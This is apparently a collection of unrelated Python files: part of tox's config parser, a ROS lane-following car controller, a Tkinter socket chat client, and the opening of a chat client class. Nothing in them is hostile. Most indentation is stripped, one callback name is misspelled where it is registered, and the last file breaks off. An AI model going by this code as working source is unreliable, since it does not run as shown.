elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
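# Illustration (behavior as read from the helpers above): a factor expression such
# as "py36-!cov" splits into an (included, excluded) pair, e.g.
# _split_factor_expr("py36-!cov") -> [({"py36"}, {"cov"})]: the line applies to
# environments that contain the "py36" factor and do not contain the "cov" factor.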
def _expand_envstr(envstr):
# split by commas not in groups
tokens = re.split(r"((?:\{[^}]+\})+)|,", envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = re.split(r"\{([^}]+)\}", env)
parts = [re.sub(r"\s+", "", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
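# The function below is an illustrative sketch added for documentation; it is not
# part of tox itself and only demonstrates how _expand_envstr behaves.
def _example_expand_envstr():
    # "py{36,37}-django{2,3}" expands to the cartesian product of its brace groups:
    # ["py36-django2", "py36-django3", "py37-django2", "py37-django3"]
    return _expand_envstr("py{36,37}-django{2,3}")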
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
"""Check value matches substitution form of referencing value from other section.
E.g. {[base]commands}
"""
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s)
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
            # Factors need to be applied before unwrapping dependencies, otherwise
            # the substitution process can break. Once dependencies are unwrapped,
            # factors are applied again for the newly introduced entries.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = re.search(r"^([\w{}\.!,-]+)\:\s+(.+)", line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name)
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
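    # Illustration (not part of the original source): with reader substitutions such
    # as {"toxinidir": "/proj"}, do_replace("{toxinidir}/src") yields "/proj/src";
    # nested forms like "{env:FOO:{toxinidir}}" expand innermost-first because the
    # regex is re-applied until the value stops changing.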
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided"
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type)
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack)
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands"
)
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
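# Illustration (not part of the original source): CommandParser splits a command
# string into "words" while keeping {...} substitution groups together as single
# words, so that processcommand() above can swap whole units such as "{posargs}"
# or "{env:NAME}" before the final shlex split.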
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
Run2 (copy).py
|
#!/usr/bin/env python
# license removed for brevity
import rospy
import cv2
import numpy as np
import time
import threading
from std_msgs.msg import String, Float32, Bool
from sensor_msgs.msg import CompressedImage
import sys
from modules.Control import PID, Fuzzy
from modules.Advance import Advance_lane, Speed_prediction
from modules.Route2 import navigator
from modules.PyCallCpp import get_shortest_route
from modules.Classic import Classic, Pre
from modules.Camera import get_rgb, get_depth
import config as cf
import rospkg
rospack = rospkg.RosPack()
path = rospack.get_path('r4f')
rospy.init_node('run', anonymous=True, disable_signals=True)
cf.pos_cam_pub = rospy.Publisher('/set_pos_camera_api', Float32, queue_size=1)
def set_led(led_stt):
led_pub = rospy.Publisher('/led_status', Bool, queue_size=1)
led_pub.publish(led_stt)
def reset_mpu():
reset_mpu = rospy.Publisher("/mpu_9250_node/reset", Float32, queue_size=1)
reset_mpu.publish(1.0)
def set_speed(speed):
if cf.pause or cf.pause2:
speed = 0
if cf.barrier is not None and speed >10:
speed -=5
if speed > 30:
speed = 30
if speed < -30:
speed = -30
speed_pub = rospy.Publisher('/set_speed_car_api', Float32, queue_size=1)
speed_pub.publish(speed)
def set_steer(steer):
steer_pub = rospy.Publisher('/set_steer_car_api', Float32, queue_size=1)
steer_pub.publish(steer)
def set_lcd(text):
lcd_pub = rospy.Publisher('/lcd_print', String, queue_size=1)
lcd_pub.publish(text)
def print_lcd(line):
texts = ["00:0:Speed=", "00:1:Max=", "00:2:Mode=", "00:3:Rec=", "10:0:Angle="]
lane_modes = ["Cla", "Adv", "Line"]
info = [str(cf.speed_offset), str(cf.max_addition_speed), lane_modes[cf.lane_mode], str(cf.is_record), str(int(cf.angle))]
    text = texts[line] + info[line]
    space = (14 - len(text)) * " "
    text += space
set_lcd(text)
def get_ss_status(data):
set_led(not data.data)
if data.data is True:
time.sleep(1)
cf.pause2 = not data.data
else:
cf.pause2 = not data.data
time.sleep(0.1)
def get_bt1_status(data):  # outermost button on the right
if data.data and not cf.bt1_old:
cf.pause = not cf.pause
cf.bt1_old = data.data
time.sleep(0.1)
def get_bt2_status(data):
if data.data and not cf.bt2_old:
if cf.cursor == 0:
cf.speed_offset -= 1
if cf.cursor == 1:
cf.max_addition_speed -= 1
print_lcd(cf.cursor)
cf.bt2_old = data.data
time.sleep(0.1)
def get_bt3_status(data):
if data.data and not cf.bt3_old:
if cf.cursor == 0:
cf.speed_offset += 1
cf.pause = False
if cf.cursor == 1:
cf.max_addition_speed += 1
if cf.cursor == 2:
cf.lane_mode = (cf.lane_mode+1)%3
if cf.cursor == 3:
cf.is_record = not cf.is_record
if cf.cursor == 4:
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
print_lcd(cf.cursor)
cf.bt3_old = data.data
time.sleep(0.1)
def get_bt4_status(data):
if data.data and not cf.bt4_old:
cf.cursor = (cf.cursor+1)%5
print_lcd(cf.cursor)
cf.bt4_old = data.data
time.sleep(0.1)
cf.angle_offset = 0
cf.angle_y_offset = 0
def get_angle(data):
cf.angle0 = data.data
cf.angle = cf.angle0 + cf.angle_offset
if cf.angle<0:
cf.angle = 360 +cf.angle
def get_angle_y(data):
cf.angle1 = data.data
cf.angle_y = cf.angle1 + cf.angle_y_offset
if cf.angle_y>360:
cf.angle_y =cf.angle_y- 360
lech = cf.angle_y - cf.angle_y_checkpoint
if lech>180:
lech = 360 - lech
cf.angle_y_array = np.concatenate([cf.angle_y_array, [lech]])
cf.angle_y_array = cf.angle_y_array[1:]
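# Note (assumption): cf.angle_y_array keeps a rolling window of the last 10
# deviations of angle_y from its checkpoint; the navigator presumably uses this
# window to decide when a turn or the bridge section has been completed.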
cf.route =''
cf.old_route =''
def get_route_message(data):
    route_message = data.data
    route_arr = route_message.split('-')
    num = str(len(route_arr))
    cf.route = num
    for checkpoint in route_arr:
        cf.route = cf.route + " " + str(checkpoint)
print "#"*20
print "Received new route message:", cf.route
if cf.route != cf.old_route:
cf.shortest_route = get_shortest_route(cf.route)
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
cf.old_route = cf.route
else:
print "This is old route Message"
def angle_control():
if cf.control_mode == 0:
angle = PID(cf.center- 240)
if cf.control_mode ==1:
angle = Fuzzy(cf.center - 240)
set_steer(angle)
def speed_control():
if cf.speed_mode == 0:
cf.speed = int(cf.speed_offset + cf.addition_speed_ratio*cf.max_addition_speed)
if cf.speed_mode == 1:
cf.speed = cf.dynamic_speed
set_speed(cf.speed)
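# Control summary (reading of the code above, hedged): angle_control() feeds the
# lane-center error cf.center - 240 (pixels from the middle of the 480-pixel-wide
# frame) into a PID or Fuzzy controller to produce the steering command, while
# speed_control() either uses the fixed offset plus the predicted additional-speed
# ratio or a fully dynamic speed, clamped later by set_speed().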
# System Variables
cf.bt1_old =cf.bt2_old = cf.bt3_old = cf.bt4_old = False
cf.cursor = 0
cf.HEIGHT = 320
cf.WIDTH = 480
cf.is_record = False
cf.out = cv2.VideoWriter(path+'/output.avi', cv2.VideoWriter_fourcc(*'XVID'), 30.0, (cf.WIDTH, cf.HEIGHT))
cf.img = np.zeros((480, 320, 3), np.uint8)
cf.depth =np.zeros((240, 320), np.uint8)
cf.img_show = np.zeros((320, 480), np.uint8)
cf.img_show2 = np.zeros((320, 480), np.uint8)
cf.running = True
cf.pause = True
cf.pause2 = True
cf.syn = True
# Speed Variables
cf.speed = 0
cf.speed_mode = 0
cf.speed_offset = 18
cf.max_addition_speed = 2
cf.addition_speed_ratio = 0
cf.dynamic_speed = 0
#Lane Variables
cf.map = 0
cf.steer = 0
cf.center = 240
cf.side_tracking = 0
cf.control_mode = 1
cf.lane_mode = 0
cf.time_side = time.time()
cf.pos_cam_default = 20
cf.barrier = None
cf.time_barrier = time.time()
cf.distance_default = 55
cf.distance = cf.distance_default
cf.control_mode = 0
cf.lane_choice = 0
cf.x_distance_default = 70
cf.x_distance = 0
#cf.center_old = 0
# Navigator Global Variables
cf.finish = False
cf.angle = 0
cf.angle_y = 0
cf.angle1 = 0
cf.angle_checkpoint = cf.angle
cf.angle_y_checkpoint = 0
cf.time_bridge = time.time() - 100
cf.angle_y_array = np.zeros(10)
def get_center(img_):
img = img_.copy()
if cf.side_tracking == -1:
cv2.rectangle(img, (0, 0), (80, 80), (0, 0, 255), -1)
elif cf.side_tracking == 1:
cv2.rectangle(img, (400, 0), (480, 80), (0, 0, 255), -1)
else:
cv2.rectangle(img, (200, 0), (280, 80), (0, 0, 255), -1)
if cf.lane_mode == 1:
center = Advance_lane(img)
cf.center = center
cv2.circle(img, (cf.center, 250), 5, (0, 255, 0), -1)
cf.img_show = img
if cf.lane_mode == 0:
side_tracking = cf.side_tracking
if side_tracking == -1:
side_tracking = 0
img, img2, center= Classic(img, side_tracking, cf.lane_choice, cf.distance, cf.center, cf.x_distance)
if time.time()-cf.time_side < 0.075:
cf.center = 240 - 30*(1-2*side_tracking)
#cf.center_old = cf.center
else:
cf.center = center
cf.img_show = img
cf.img_show2 = img2
def speed_Prediction():
print("Speed_Prediction started!")
while cf.running:
cf.addition_speed_ratio = Speed_prediction(cf.img)
print("Speed_Prediction stoped!")
cf.time_fps = time.time()-1
cf.fps = 0
def main():
print("Main started!")
time.sleep(1)
set_lcd("0:0: ");time.sleep(0.2)
print_lcd(0);time.sleep(0.2)
print_lcd(1);time.sleep(0.2)
print_lcd(2);time.sleep(0.2)
print_lcd(3);time.sleep(0.2)
print_lcd(4);
while cf.running:
if cf.syn:
cf.fps = int(1/(time.time()-cf.time_fps))
cf.time_fps = time.time()
cf.syn = False
get_center(cf.img)
angle_control()
speed_control()
time_lcd = time.time()
def show():
    global time_lcd
print("Show_thread started !")
while cf.running:
font = cv2.FONT_HERSHEY_SIMPLEX
control_modes = ["Fuz", "PID"]
lane_modes = ["Cla", "Adv", "Line"]
img = cf.img_show.copy()
if cf.is_record:
cf.out.write(cf.img)
if cf.barrier == 0:
cv2.rectangle(img, (0, 80), (80, 160), (255, 0, 0), -1)
if cf.barrier == 1:
cv2.rectangle(img, (400, 80), (480, 160), (255, 0, 0), -1)
cv2.putText(img,"S: "+str(cf.speed),(90,25), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(int(cf.angle)),(350,25), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(int(cf.angle_checkpoint)),(250,25), font, 1, (255,0,0), 2, 1)
cv2.putText(img,str(cf.distance),(200,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(cf.pos_cam_default),(90,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(cf.lane_choice),(300,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,"REC: "+str(cf.is_record)+" "+ str(cf.fps),(90,75), font, 0.8, (255,0,0), 2, 1)
cv2.imshow("img", img)
#cv2.imshow("img2", cf.img_show2)
#cv2.imshow("cf.depth", cf.depth)
k = cv2.waitKey(30)
if k == ord('u'):
cf.distance_default +=5
if k == ord('i'):
cf.distance_default -=5
if k == ord('t'):
cf.max_addition_speed +=1
print_lcd(1)
if k == ord('g'):
cf.max_addition_speed -=1
print_lcd(1)
if k == ord('h'):
cf.pos_cam_default +=2
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
if k == ord('j'):
cf.pos_cam_default -=2
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
if k == ord('w'):
cf.speed_offset += 1
#cf.pause = False
print_lcd(0)
print (cf.speed)
if k == ord('s'):
cf.speed_offset -= 1
print_lcd(0)
print (cf.speed)
if k == 32:
cf.pause = True
if k == ord('p'):
cf.pause = False
if k == ord('m'):
print "#"*20
cf.map = 1-cf.map
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
if k == ord('r'):
cf.side_tracking += 1
if cf.side_tracking==2:
cf.side_tracking = -1
cf.time_side = time.time()
if cf.lane_mode == 0:
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
else:
cf.pos_cam_pub.publish(0)
if k == ord('f'):
print "#"*20
reset_mpu()
time.sleep(0.5)
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
if k == ord('e'):
cf.control_mode = 1-cf.control_mode
print(cf.control_mode)
if k == ord('z'):
cf.lane_choice = (1+cf.lane_choice)%3
print(cf.lane_choice)
if k == ord('c'):
cf.lane_mode = 1-cf.lane_mode
if cf.lane_mode == 0:
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
else:
cf.pos_cam_pub.publish(0)
print_lcd(2)
if k == ord('v'):
cf.is_record = not cf.is_record
print_lcd(3)
if k == ord('q'):
cf.speed = 0
cf.steer = 0
cf.finish = False
cf.running = False
cf.go = False
set_speed(cf.speed)
set_steer(cf.steer)
cf.pos_cam_pub.publish(0)
cf.out.release()
rospy.signal_shutdown("Bo may thich")
if time.time()-time_lcd > 1:
print_lcd(4)
time_lcd = time.time()
def listener():
rospy.Subscriber("/ss_status", Bool, get_ss_status, queue_size=1)
rospy.Subscriber("/bt1_status", Bool, get_bt1_status, queue_size=1)
rospy.Subscriber("/bt2_status", Bool, get_bt2_status, queue_size=1)
rospy.Subscriber("/bt3_status", Bool, get_bt3_status, queue_size=1)
rospy.Subscriber("/bt4_status", Bool, get_bt4_status, queue_size=1)
rospy.Subscriber("/angle", Float32, get_angle, queue_size=1)
rospy.Subscriber("/angle_y", Float32, get_angle_y, queue_size=1)
rospy.Subscriber("/route", String, get_route_massage, queue_size=1)
rospy.spin()
get_rgb_thread = threading.Thread(name="get_rgb_thread", target=get_rgb)
get_rgb_thread.start()
time.sleep(0.5)
get_depth_thread = threading.Thread(name = "get_depth_thread", target=get_depth)
#get_depth_thread.start()
main_thread = threading.Thread(name= "main_thread", target= main)
main_thread.start()
speed_thread = threading.Thread(name= "speed_Prediction", target= speed_Prediction)
speed_thread.start()
show_thread = threading.Thread(name= "show information", target= show)
show_thread.start()
navigator_thread = threading.Thread(name= "Navigator_thread", target = navigator)
navigator_thread.start()
listener()
|
client2.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
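# Note (reading of the code above): "{quit}" is the sentinel message; send() forwards
# it to the server, closes the socket and quits the Tk main loop, and on_closing()
# reuses that same path when the window is closed.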
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
client.py
|
import os
import socket
from threading import Thread
from queue import Queue
from time import sleep
from pickle import load, dump
from .utils import Message, Channel
HOST = "localhost"
PORT = 5500
HOME = os.path.expanduser("~")
class Client:
def __init__(self, name: str, message_queue: Queue = Queue()) -> None:
self.name = name
self.queue = message_queue
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.online = True
self.GUPSHUP_FOLDER = os.path.join(HOME, ".config", "gupshup")
self.CHAT_DATA = os.path.join(self.GUPSHUP_FOLDER, self.name)
self.setup_db()
def setup_db(self) -> None:
"""
        Loads previously saved offline chat data if present;
        otherwise creates an empty chat store on disk
"""
try:
os.mkdir(self.GUPSHUP_FOLDER)
except FileExistsError:
pass
try:
with open(self.CHAT_DATA, "rb") as f:
self.chats = load(f)
except FileNotFoundError:
self.chats = []
with open(self.CHAT_DATA, "wb") as f:
dump(self.chats, f)
self.start = len(self.chats)
def save_chats(self) -> None:
"""
Save the chats before closing the application
"""
with open(self.CHAT_DATA, "wb") as f:
dump(self.chats, f)
def send(self, message: Message) -> None:
try:
self.channel.send(message)
except BrokenPipeError:
self.try_reconnect()
def close_connection(self):
self.conn.close()
# self.channel.close()
def listen_from_server(self) -> None:
"""
        Listens to the server and adds incoming messages to the working queue
"""
while 1:
try:
data = self.channel.recv()
self.queue.put(data)
self.chats += (data,)
except EOFError:
self.queue.put(Message(action="connection_disable"))
while not self.try_reconnect():
pass
self.queue.put(Message(action="connection_enable"))
def try_reconnect(self):
"""
        Try to reconnect after a connection failure
"""
try:
self.conn.connect((HOST, PORT))
self.conn.sendall(self.name.encode())
self.channel.close()
self.channel = Channel(self.conn)
sleep(0.01)
self.conn.sendall("-1".encode())
return True
except ConnectionRefusedError:
return False
except OSError:
self.conn.close()
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return False
def start_connection(self):
try:
